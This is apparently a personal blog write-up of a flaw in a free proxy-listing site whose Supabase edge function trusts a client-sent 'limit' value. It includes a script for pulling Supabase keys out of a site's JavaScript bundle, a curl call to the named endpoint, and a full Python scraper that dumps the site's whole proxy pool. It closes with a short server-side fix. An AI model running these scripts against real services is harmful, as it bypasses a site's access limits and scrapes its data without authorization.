Hello! My name is Rei, and today I want to share something interesting I found while browsing a free proxy listing website. The site, called ProxyHub, claims to offer “free premium proxies” but has a pretty serious logic flaw that lets you fetch way more data than intended. I’ll walk you through how I found it, what the vulnerability actually is, and how I wrote a quick Python script to grab all 7,000+ proxies in about 2 seconds.
What is ProxyHub?
ProxyHub is a website built with Lovable (a vibe-coding platform) that lists free HTTP, SOCKS4, and SOCKS5 proxies. The site shows a table of proxies to visitors, but here’s the catch: every time you hit reload, the list changes. You see 20 proxies, then 20 different ones, then 20 more. It looks like there’s a huge pool and you’re only seeing a small slice.
That got me curious.
Discovering the Vulnerability
My first instinct was to check how the site fetches its data. Since it’s a React SPA (Single Page Application), the JavaScript bundle is public. I downloaded the main JS file and started reading through the minified code.
Here’s what I found:
NOTE: The site uses Supabase as its backend. Supabase is a popular open-source alternative to Firebase, and it provides a REST API for your database along with “Edge Functions” for custom server-side logic.
The proxy list isn’t fetched directly from a database table. Instead, the frontend calls a Supabase Edge Function called fetch-proxies. This function accepts a JSON body with two parameters:
{
  "type": "HTTP",
  "limit": 300
}

The `type` parameter filters by proxy type (HTTP, SOCKS4, SOCKS5), and `limit` controls how many proxies to return. The frontend defaults to 300 for free users and 500 for VIP users, then randomly picks 20 from that batch to display.
But here’s the problem: there’s no server-side enforcement of the limit. The edge function trusts whatever number you send. I could request 9,999 proxies in a single call.
To make things worse, the Supabase anon key (used for authentication) is embedded directly in the JavaScript bundle. This is actually normal for Supabase apps — the anon key is meant to be public. But it means anyone can call the edge function directly.
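If you want to pull these values out of a bundle yourself, here is a minimal sketch. The bundle URL below is a placeholder (grab the real path from the page's script tags); the regexes just rely on the facts that Supabase project URLs follow the `https://<ref>.supabase.co` pattern and anon keys are JWTs starting with `eyJ`:

```python
# Sketch: download a site's main JS bundle and regex out the Supabase
# project URL and anon key. BUNDLE_URL is a placeholder, not the real path.
import re
import urllib.request

BUNDLE_URL = "https://example.com/assets/index-abc123.js"  # replace with the real bundle path

with urllib.request.urlopen(BUNDLE_URL, timeout=30) as r:
    bundle = r.read().decode("utf-8", errors="replace")

# Supabase project URLs look like https://<project-ref>.supabase.co,
# and anon keys are JWTs: three base64url segments starting with "eyJ".
urls = set(re.findall(r"https://[a-z0-9]+\.supabase\.co", bundle))
keys = set(re.findall(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+", bundle))

print("Supabase URLs:", urls)
print("Candidate anon keys:", keys)
```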
The Full Picture
I wrote a quick test using curl:
curl -X POST 'https://vwmhbpgwhfwuwtattset.supabase.co/functions/v1/fetch-proxies' \
-H 'apikey: <anon_key>' \
-H 'Authorization: Bearer <anon_key>' \
-H 'Content-Type: application/json' \
-d '{"limit": 9999}'The response came back with totalAvailable: 326,340. The site claims to have over 326,000 proxies. But when I actually counted the unique ones across multiple calls, the real number was 7,319. The rest are likely duplicates or historical entries.
Building the Fetcher
With that knowledge, I wrote a Python script to automatically fetch all unique proxies. The approach is simple:
- Call the `fetch-proxies` endpoint with `limit=9999`
- Collect all returned proxies, deduplicating by `ip:port`
- Repeat until no new proxies appear
- Save everything to TXT files (plain and with protocol prefix)
Here’s the script:
#!/usr/bin/env python3
import json, time, urllib.request, sys
from datetime import datetime
URL = "https://vwmhbpgwhfwuwtattset.supabase.co/functions/v1/fetch-proxies"
KEY = "<anon_key>"
HEADERS = {"apikey": KEY, "Authorization": f"Bearer {KEY}", "Content-Type": "application/json"}
LIMIT, RETRIES, RETRY_DELAY, NO_NEW_STOP = 9999, 3, 2, 3
def fetch_batch(proxy_type=None):
    # Only include "type" in the body when filtering by a specific protocol.
    body = json.dumps({"limit": LIMIT, **({"type": proxy_type.upper()} if proxy_type and proxy_type != "all" else {})}).encode()
    for attempt in range(RETRIES):
        try:
            req = urllib.request.Request(URL, data=body, headers=HEADERS)
            with urllib.request.urlopen(req, timeout=30) as r:
                res = json.loads(r.read())
            if res.get("success"):
                return res.get("proxies", []), res.get("totalAvailable", 0)
            print(f" API error: {res.get('error')}", file=sys.stderr)
        except Exception as e:
            print(f" Attempt {attempt + 1} failed: {e}", file=sys.stderr)
        if attempt < RETRIES - 1:
            time.sleep(RETRY_DELAY * (attempt + 1))
    return [], 0

def fetch_all():
    seen, no_new = {}, 0
    print(f"Fetching proxies...\nEndpoint: {URL}\n")
    # Keep calling until NO_NEW_STOP consecutive batches add nothing new.
    while no_new < NO_NEW_STOP:
        batch, total = fetch_batch()
        # dict.update() returns None, so "not seen.update(...)" stores the proxy and still counts it as new.
        new = sum(1 for p in batch if (k := f"{p['ip']}:{p['port']}") not in seen and not seen.update({k: p}))
        print(f" Batch: {len(batch)} | New: {new} | Unique: {len(seen)} | DB: {total}")
        no_new = 0 if new else no_new + 1
        time.sleep(0.5)
    return list(seen.values())

def main():
    proxies = fetch_all()
    if not proxies:
        print("\nNo proxies fetched.")
        return
    ts = datetime.now().strftime("%Y%m%d_%H%M%S")
    p = f"proxies_{ts}"
    print(f"\nSaving {len(proxies)} proxies...")
    with open(f"{p}.txt", "w") as f:
        f.writelines(f"{x['ip']}:{x['port']}\n" for x in proxies)
    print(f" TXT: {p}.txt")
    with open(f"{p}_with_proto.txt", "w") as f:
        f.writelines(f"{x.get('type','HTTP').lower()}://{x['ip']}:{x['port']}\n" for x in proxies)
    print(f" TXT: {p}_with_proto.txt")
    # Tally simple stats by type, status, and country.
    types = {}; statuses = {}; countries = {}
    for x in proxies:
        types[x.get("type","?")] = types.get(x.get("type","?"), 0) + 1
        statuses[x.get("status","?")] = statuses.get(x.get("status","?"), 0) + 1
        countries[x.get("country","Unknown")] = countries.get(x.get("country","Unknown"), 0) + 1
    print(f"\n--- Stats ---\nTotal: {len(proxies)}")
    print(f"By type: {dict(sorted(types.items(), key=lambda x: -x[1]))}")
    print(f"By status: {statuses}")
    print(f"Top countries: {dict(sorted(countries.items(), key=lambda x: -x[1])[:5])}")

if __name__ == "__main__":
    main()

Results
Running the script takes about 2 seconds. Here’s what I got:
| Metric | Value |
|---|---|
| Total unique proxies | 7,319 |
| SOCKS5 | 2,641 |
| HTTP | 2,385 |
| SOCKS4 | 2,293 |
| Online | 6,447 |
| Offline | 872 |
The script outputs two files:
- `proxies_*.txt`: plain `ip:port` format
- `proxies_*_with_proto.txt`: format like `http://1.2.3.4:8080`
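As a quick usage example, here is one way to consume the protocol-prefixed file with nothing but the standard library. The filename is hypothetical (yours will carry the run's timestamp), and only `http://` entries are used, since SOCKS proxies would need an extra dependency such as PySocks:

```python
# Try the first http:// proxy from the output file against a test URL.
import urllib.request

PROXY_FILE = "proxies_20250507_120000_with_proto.txt"  # hypothetical; point at your timestamped output

with open(PROXY_FILE) as f:
    http_proxies = [line.strip() for line in f if line.startswith("http://")]

proxy = http_proxies[0]
opener = urllib.request.build_opener(urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
try:
    with opener.open("http://httpbin.org/ip", timeout=10) as r:
        print(proxy, "->", r.read().decode())
except Exception as e:
    print(proxy, "failed:", e)
```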
Pool Churn
I was also curious about how stable the proxy pool is, so I ran the script twice — once on May 7 and once on May 8 — and compared the results:
| Metric | Count |
|---|---|
| Old proxies | 7,319 |
| New proxies | 5,740 |
| Kept | 2,825 |
| Removed | 4,494 |
| Added | 2,915 |
| Stability | 38.6% |
That’s huge churn. Only 38.6% of the proxies survived overnight. The site’s health checker probably removes dead proxies and scrapes new ones constantly.
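The comparison itself is just set arithmetic over the two plain-text outputs. A small sketch (the filenames are placeholders for the two runs' output files):

```python
# Compare two runs' ip:port outputs: what survived, what disappeared, what's new.
def load(path):
    with open(path) as f:
        return {line.strip() for line in f if line.strip()}

old = load("proxies_old.txt")  # placeholder: output from the first run
new = load("proxies_new.txt")  # placeholder: output from the second run

kept = old & new
print(f"Old: {len(old)} | New: {len(new)}")
print(f"Kept: {len(kept)} | Removed: {len(old - new)} | Added: {len(new - old)}")
print(f"Stability: {len(kept) / len(old):.1%}")
```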
How to Fix It
The vulnerability is straightforward to fix. The fetch-proxies edge function needs to enforce the limit server-side:
const MAX_FREE_LIMIT = 20;
const MAX_VIP_LIMIT = 300;
const { data: { user } } = await supabase.auth.getUser()
const isVip = user ? await checkVipStatus(supabase, user.id) : false;
const maxLimit = isVip ? MAX_VIP_LIMIT : MAX_FREE_LIMIT;
const limit = Math.min(requestBody.limit || MAX_FREE_LIMIT, maxLimit);

The frontend randomization of 20 proxies per page load is just cosmetic. Real access control has to happen on the server.
Conclusion
Vibe-coding tools like Lovable are great for quickly building and shipping apps, but they can lead to security oversights when the generated code doesn’t properly handle server-side validation. In this case, the edge function blindly trusts the client, making the entire “premium” paywall meaningless.
If you’re building something similar, always validate and enforce limits on the server side. Never trust the client.
Stay tuned for more!